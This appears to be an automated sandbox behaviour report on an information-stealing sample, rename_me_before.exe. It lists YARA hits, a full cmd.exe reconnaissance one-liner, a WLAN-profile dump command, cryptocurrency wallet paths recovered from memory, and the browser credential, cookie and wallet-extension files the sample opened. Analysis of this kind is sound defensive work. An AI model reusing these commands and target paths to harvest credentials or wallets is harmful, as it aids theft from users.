Source: Yara match | File source: 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rename_me_before.exe PID: 3512, type: MEMORYSTR
Source: Yara match | File source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rename_me_before.exe PID: 3512, type: MEMORYSTR
Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Cookies.txt
Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Firefox\History.txt
Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\network_info.txt
Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\system_info.txt
Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\process_info.txt
Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "Electrum": os.path.join(self.RoamingAppData, "Electrum", "wallets"),
Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "Jaxx": os.path.join(self.RoamingAppData, "com.liberty.jaxx", "IndexedDB", "file__0.indexeddb.leveldb"),
Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "Exodus": "aholpfdialjgjfhomihkjbmgjidlcdno",
Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmpJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.filesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\dbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
